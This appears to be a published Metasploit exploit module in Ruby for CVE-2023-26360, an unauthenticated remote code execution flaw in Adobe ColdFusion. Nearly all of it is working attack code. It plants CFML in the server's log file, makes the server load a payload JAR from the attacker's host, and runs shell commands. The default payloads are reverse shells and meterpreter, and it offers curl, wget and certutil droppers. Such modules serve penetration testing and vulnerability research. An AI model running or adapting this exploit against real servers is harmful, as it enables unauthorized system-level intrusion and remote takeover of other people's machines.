Adobe ColdFusion Unauthenticated Remote Code Execution

`##  
# This module requires Metasploit: https://metasploit.com/download  
# Current source: https://github.com/rapid7/metasploit-framework  
##  
  
class MetasploitModule < Msf::Exploit::Remote  
Rank = ExcellentRanking  
  
include Msf::Exploit::Remote::HttpClient  
include Msf::Exploit::Remote::HttpServer::HTML  
include Msf::Exploit::CmdStager  
  
def initialize(info = {})  
super(  
update_info(  
info,  
'Name' => 'Adobe ColdFusion Unauthenticated Remote Code Execution',  
'Description' => %q{  
This module exploits a remote unauthenticated deserialization of untrusted data vulnerability in Adobe  
ColdFusion 2021 Update 5 and earlier as well as ColdFusion 2018 Update 15 and earlier, in  
order to gain remote code execution.  
},  
'License' => MSF_LICENSE,  
'Author' => [  
'sf', # MSF Exploit & Rapid7 Analysis  
],  
'References' => [  
['CVE', '2023-26360'],  
['URL', 'https://attackerkb.com/topics/F36ClHTTIQ/cve-2023-26360/rapid7-analysis']  
],  
'DisclosureDate' => '2023-03-14',  
'Platform' => %w[java win linux unix],  
'Arch' => [ARCH_JAVA, ARCH_CMD, ARCH_X86, ARCH_X64],  
'Privileged' => true, # Code execution as 'NT AUTHORITY\SYSTEM' on Windows and 'nobody' on Linux.  
'WfsDelay' => 30,  
'Targets' => [  
[  
'Generic Java',  
{  
'Type' => :java,  
'Platform' => 'java',  
'Arch' => [ ARCH_JAVA ],  
'DefaultOptions' => {  
'PAYLOAD' => 'java/meterpreter/reverse_tcp'  
}  
},  
],  
[  
'Windows Command',  
{  
'Type' => :cmd,  
'Platform' => 'win',  
'Arch' => ARCH_CMD,  
'DefaultOptions' => {  
'PAYLOAD' => 'cmd/windows/powershell_reverse_tcp'  
}  
},  
],  
[  
'Windows Dropper',  
{  
'Type' => :dropper,  
'Platform' => 'win',  
'Arch' => [ ARCH_X86, ARCH_X64 ],  
'CmdStagerFlavor' => [ 'certutil', 'psh_invokewebrequest' ],  
'DefaultOptions' => {  
'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'  
}  
}  
],  
[  
'Unix Command',  
{  
'Type' => :cmd,  
'Platform' => 'unix',  
'Arch' => ARCH_CMD,  
'DefaultOptions' => {  
'PAYLOAD' => 'cmd/unix/reverse_perl'  
}  
},  
],  
[  
'Linux Dropper',  
{  
'Type' => :dropper,  
'Platform' => 'linux',  
'Arch' => [ARCH_X64],  
'CmdStagerFlavor' => [ 'curl', 'wget', 'bourne', 'printf' ],  
'DefaultOptions' => {  
'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp'  
}  
}  
],  
],  
'DefaultTarget' => 0,  
'Notes' => {  
'Stability' => [CRASH_SAFE],  
'Reliability' => [REPEATABLE_SESSION],  
'SideEffects' => [  
# The following artifacts will be left on disk:  
# The compiled CFML class generated from the poisoned coldfusion-out.log (Note: the hash number will vary)  
# * Windows: C:\ColdFusion2021\cfusion\wwwroot\WEB-INF\cfclasses\cfcoldfusion2dout2elog376354580.class  
# * Linux: /opt/ColdFusion2021/cfusion/wwwroot/WEB-INF/cfclasses/cfcoldfusion2dout2elog181815836.class  
# If a dropper payload was used, a file with a random name may be left.  
# * Windows: C:\Windows\Temp\XXXXXX.exe  
# * Linux: /tmp/XXXXXX  
ARTIFACTS_ON_DISK,  
# The following logs will contain IOCs:  
# C:\ColdFusion2021\cfusion\logs\coldfusion-out.log  
# C:\ColdFusion2021\cfusion\logs\exception.log  
# C:\ColdFusion2021\cfusion\logs\application.log  
IOC_IN_LOGS  
],  
'RelatedModules' => [  
'auxiliary/gather/adobe_coldfusion_fileread_cve_2023_26360'  
]  
}  
)  
)  
  
register_options(  
[  
Opt::RPORT(8500),  
OptString.new('URIPATH', [false, 'The URI to use for this exploit', '/']),  
OptString.new('CFC_ENDPOINT', [true, 'The target ColdFusion Component (CFC) endpoint', '/cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/iedit.cfc']),  
OptString.new('CF_LOGFILE', [true, 'The target log file, relative to the wwwroot folder.', '../logs/coldfusion-out.log'])  
]  
)  
end  
  
def check  
res = send_request_cgi(  
'method' => 'GET',  
'uri' => '/'  
)  
  
return CheckCode::Unknown('Connection failed') unless res  
  
# We cannot identify the ColdFusion version through a generic technique. Instead we use the Recog fingerprint  
# to match a ColdFusion cookie, and use this information to detect ColdFusion as being present.  
# https://github.com/rapid7/recog/blob/main/xml/http_cookies.xml#L69  
  
if res.get_cookies =~ /(CFCLIENT_[^=]+|CFGLOBALS|CFID|CFTOKEN)=|.cfusion/  
return CheckCode::Detected('ColdFusion detected but version number is unknown.')  
end  
  
CheckCode::Unknown  
end  
  
def exploit  
unless datastore['CFC_ENDPOINT'].end_with?('.cfc')  
fail_with(Failure::BadConfig, 'The CFC_ENDPOINT must point to a .cfc file')  
end  
  
case target['Type']  
when :java  
# Start the HTTP server  
start_service  
  
# Trigger a loadClass request via java.net.URLClassLoader  
trigger_urlclassloader  
  
# Handle the payload...  
handler  
when :cmd  
execute_command(payload.encoded)  
when :dropper  
execute_cmdstager  
end  
end  
  
def on_request_uri(cli, _req)  
if target['Type'] == :java  
print_status('Received payload request, transmitting payload jar...')  
  
send_response(cli, payload.encoded, {  
'Content-Type' => 'application/java-archive',  
'Connection' => 'close',  
'Pragma' => 'no-cache'  
})  
else  
super  
end  
end  
  
def trigger_urlclassloader  
# Here we construct a CFML payload to load a Java payload via URLClassLoader.  
  
# NOTE: If our URL ends with / a XXX.class is loaded, if no trailing slash then a JAR is expected to be returned.  
  
cf_url = Rex::Text.rand_text_alpha_lower(4)  
  
srvhost = datastore['SRVHOST']  
  
# Ensure SRVHOST is a routable IP address to our RHOST.  
if Rex::Socket.addr_atoi(srvhost) == 0  
srvhost = Rex::Socket.source_address(rhost)  
end  
  
# Create a URL pointing back to our HTTP server.  
cfc_payload = "<cfset #{cf_url} = createObject('java','java.net.URL').init('http://#{srvhost}:#{datastore['SRVPORT']}')/>"  
  
cf_reflectarray = Rex::Text.rand_text_alpha_lower(4)  
  
# Get a reference to java.lang.reflect.Array so we can create a URL[] instance.  
cfc_payload << "<cfset #{cf_reflectarray} = createObject('java','java.lang.reflect.Array')/>"  
  
cf_array = Rex::Text.rand_text_alpha_lower(4)  
  
# Create a URL[1] instance.  
cfc_payload << "<cfset #{cf_array} = #{cf_reflectarray}.newInstance(#{cf_url}.getClass(),1)/>"  
  
# Set the first element in the array to our URL.  
cfc_payload << "<cfset #{cf_reflectarray}.set(#{cf_array},0,#{cf_url})/>"  
  
cf_loader = Rex::Text.rand_text_alpha_lower(4)  
  
# Create a URLClassLoader instance.  
cfc_payload << "<cfset #{cf_loader} = createObject('java','java.net.URLClassLoader').init(#{cf_array},javaCast('null',''))/>"  
  
# Load the remote JAR file and instantiate an instance of metasploit.Payload.  
cfc_payload << "<cfset #{cf_loader}.loadClass('metasploit.Payload').newInstance().main(javaCast('null',''))/>"  
  
execute_cfml(cfc_payload)  
end  
  
def execute_command(cmd, _opts = {})  
cf_param = Rex::Text.rand_text_alpha_lower(4)  
  
# If the cf_param is present in the HTTP requests www-form encoded data then proceed with the child tags.  
cfc_payload = "<cfif IsDefined('form.#{cf_param}') is 'True'>"  
  
# Set our cf_param with the data in the requests form data, this is the command to run.  
cfc_payload << "<cfset #{cf_param}=form.#{cf_param}/>"  
  
# Here we construct a CFML payload to stage the :cmd and :dropper commands...  
shell_name = nil  
shell_arg = nil  
  
case target['Platform']  
when 'win'  
shell_name = 'cmd.exe'  
shell_arg = '/C'  
when 'linux', 'unix'  
shell_name = '/bin/sh'  
shell_arg = '-c'  
end  
  
cf_array = Rex::Text.rand_text_alpha_lower(4)  
  
# Create an array of arguments to pass to exec()  
cfc_payload << "<cfset #{cf_array}=['#{shell_name}','#{shell_arg}',#{cf_param}]/>"  
  
cf_runtime = Rex::Text.rand_text_alpha_lower(4)  
  
# Get a reference to the java.lang.Runtime class.  
cfc_payload << "<cfobject action='create' type='java' class='java.lang.Runtime' name='#{cf_runtime}'/>"  
  
# Call the static Runtime.exec method to execute our string array holding the command and the arguments.  
cfc_payload << "<cfset #{cf_runtime}.getRuntime().exec(#{cf_array})/>"  
  
# The end of the If tag.  
cfc_payload << '</cfif>'  
  
execute_cfml(cfc_payload, cf_param, cmd)  
end  
  
def execute_cfml(cfml, param = nil, param_data = nil)  
cfc_payload = '<cftry>'  
  
cfc_payload << cfml  
  
cfc_payload << "<cfcatch type='any'>"  
  
cfc_payload << '</cfcatch>'  
  
cfc_payload << '<cffinally>'  
  
# Clear the CF_LOGFILE which will contain this CFML code. We need to do this so we can repeatedly execute commands.  
# GetCurrentTemplatePath returns 'C:\ColdFusion2021\cfusion\wwwroot\..\logs\coldfusion-out.log' as this is the  
# template we are executing.  
cfc_payload << "<cffile action='write' file='#GetCurrentTemplatePath()#' output=''></cffile>"  
  
cfc_payload << '</cffinally>'  
  
cfc_payload << '</cftry>'  
  
# We can only log ~950 characters to a log file before the output is truncated, so we enforce a limit here.  
unless cfc_payload.length < 950  
fail_with(Failure::BadConfig, 'The CFC payload is too big to fit in the log file')  
end  
  
# We dont need to call a valid CFC method, so we just create a random method name to supply to the server.  
cfc_method = Rex::Text.rand_text_alpha_lower(1..8)  
  
# Perform the request that writes the cfc_payload to the CF_LOGFILE.  
res = send_request_cgi(  
'method' => 'POST',  
'uri' => normalize_uri(datastore['CFC_ENDPOINT']),  
'vars_get' => { 'method' => cfc_method, '_cfclient' => 'true' },  
'vars_post' => { '_variables' => "{#{cfc_payload}" }  
)  
  
unless res && res.code == 200 && res.body.include?('<title>Error</title>')  
fail_with(Failure::UnexpectedReply, 'Failed to plant the payload in the ColdFusion output log file')  
end  
  
# The relative path from wwwroot to the CF_LOGFILE.  
cflog_file = datastore['CF_LOGFILE']  
  
# To construct the arbitrary file path from the attacker provided class name, we must insert 1 or 2 characters  
# to satisfy how coldfusion.runtime.JSONUtils.convertToTemplateProxy extracts the class name.  
if target['Platform'] == 'win'  
classname = "#{Rex::Text.rand_text_alphanumeric(1)}#{cflog_file.gsub('/', '\\')}"  
else  
classname = "#{Rex::Text.rand_text_alphanumeric(1)}/#{cflog_file}"  
end  
  
json_variables = "{\"_metadata\":{\"classname\":#{classname.to_json}},\"_variables\":[]}"  
  
vars_post = { '_variables' => json_variables }  
  
unless param.nil? || param_data.nil?  
vars_post[param] = param_data  
end  
  
# Perform the request that executes the CFML we wrote to the CF_LOGFILE, while passing the shell command to be  
# executed as a parameter which will in turn be read back out by the CFML in the cfc_payload.  
res = send_request_cgi(  
'method' => 'POST',  
'uri' => normalize_uri(datastore['CFC_ENDPOINT']),  
'vars_get' => { 'method' => cfc_method, '_cfclient' => 'true' },  
'vars_post' => vars_post  
)  
  
unless res && res.code == 200 && res.body.include?('<title>Error</title>')  
fail_with(Failure::UnexpectedReply, 'Failed to execute the payload in the ColdFusion output log file')  
end  
end  
  
end  
`